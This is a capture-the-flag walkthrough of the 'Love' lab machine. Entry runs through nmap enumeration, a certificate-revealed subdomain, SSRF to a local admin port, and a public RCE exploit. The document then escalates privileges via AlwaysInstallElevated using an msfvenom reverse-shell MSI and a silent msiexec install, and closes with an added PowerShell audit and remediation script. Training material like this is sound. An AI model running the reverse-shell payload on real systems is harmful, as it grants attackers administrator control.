# Love

## Gaining Access

Nmap scan:

<figure><img src="/files/mQJfjV4ggJ3Ig8N7zJMm" alt=""><figcaption></figcaption></figure>

Lots of ports open.

### TLS Cert Checking

Port 80 reveals a voting system that requires credentials. Port 5000 was blocked off externally, for whatever reason.

<figure><img src="/files/GgaXy2kpgvUD4j92ate7" alt=""><figcaption></figcaption></figure>

A bit of enumeration on the type of service running reveals that it is outdated software with many known vulnerabilities:

<figure><img src="/files/FENLFbGE4slKnOMcttaz" alt=""><figcaption></figcaption></figure>

Checking the certificate on port 443 reveals a hidden sub-domain.

<figure><img src="/files/RA6F8Na0DEQhi780WSzx" alt=""><figcaption></figcaption></figure>

We can add this to the `/etc/hosts` file and view it.

### SSRF -> Authenticated RCE

The sub-domain found reveals this:

<figure><img src="/files/m00ebYkLQpiNWa9mLnJV" alt=""><figcaption></figcaption></figure>

After signing up and viewing it, we are directed to this page:

<figure><img src="/files/WnGsccL54Cw67ks03kSZ" alt=""><figcaption></figcaption></figure>

I was able to get hits on an HTTP server hosted on my machine, but I could not download or execute anything. Since it was the server sending the requests, I tried to enter `http://localhost:5000` and was returned this:

<figure><img src="/files/NqqpiaQ5t1EoQJxdCQtd" alt=""><figcaption></figcaption></figure>

With these credentials, we can now get a shell using a publicly available authenticated RCE exploit. Just change the settings here:

<figure><img src="/files/ElZqO5tS3nPDvooltAhA" alt=""><figcaption></figcaption></figure>

Then run the exploit:

<figure><img src="/files/MArDdyT0KEmfB3JNmpT9" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### AlwaysInstallElevated

When on the machine, I ran winPEAS to enumerate for me and found that `AlwaysInstallElevated` was set to 1.

<figure><img src="/files/tacqnmoNLYHPV6VpSRjp" alt=""><figcaption></figcaption></figure>

This misconfiguration allows us to execute commands as the Administrator user through `msiexec`, because any MSI package we install is run with elevated privileges. As such, we first need to generate a quick reverse shell MSI using `msfvenom`.

```bash
# on attacking machine: build an MSI that spawns a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o rev.msi

# on target: install the MSI silently; AlwaysInstallElevated runs it with elevated privileges
msiexec /quiet /qn /i C:\directory\to\rev.msi
```

Afterwards, we would get a shell as the administrator:

<figure><img src="/files/pvJWrn0xbAsZWGNkKKGG" alt=""><figcaption></figcaption></figure>
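As an added example (not part of the original writeup), the following PowerShell script checks the condition winPEAS flagged above by reading `AlwaysInstallElevated` from both registry hives, and with the `-Remediate` switch (a parameter defined here) clears it. It assumes it is run from an account allowed to read and, for remediation, write both hives.

```powershell
# Added audit script, not from the original writeup.
# AlwaysInstallElevated is only honoured by Windows Installer when BOTH the
# machine policy (HKLM) and the user policy (HKCU) are set to 1.
param(
    [switch]$Remediate   # hypothetical switch defined for this example
)

$Paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # Returns one object per hive: Value is 1/0 or $null when the key or value is absent.
    foreach ($Path in $Paths) {
        $Value = $null
        if (Test-Path $Path) {
            $Item = Get-ItemProperty -Path $Path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
            if ($null -ne $Item) { $Value = $Item.AlwaysInstallElevated }
        }
        [pscustomobject]@{ Hive = $Path.Split(':')[0]; Path = $Path; Value = $Value }
    }
}

$States = Get-AlwaysInstallElevatedState
$States | Format-Table -AutoSize

# Exploitable only when both hives are 1; a single hive set to 1 is still
# worth reporting because the other can be flipped by a local user (HKCU)
# or by group policy (HKLM).
$EnabledCount = @($States | Where-Object { $_.Value -eq 1 }).Count
if ($EnabledCount -eq 2) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKLM and HKCU: any local user can install an MSI with elevated (SYSTEM) privileges.'
} elseif ($EnabledCount -eq 1) {
    Write-Warning 'AlwaysInstallElevated is set to 1 in one hive only; the policy is not active yet but should be cleared.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled.'
}

if ($Remediate) {
    foreach ($State in $States) {
        if ($State.Value -eq 1) {
            Set-ItemProperty -Path $State.Path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
            Write-Output "Set $($State.Path)\AlwaysInstallElevated to 0"
        }
    }
}
```

Run it as `.\Check-AlwaysInstallElevated.ps1` to audit, or with `-Remediate` to clear the value; the matching Group Policy setting is "Always install with elevated privileges" under both Computer and User Configuration, which should be set to Disabled so the value does not return.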
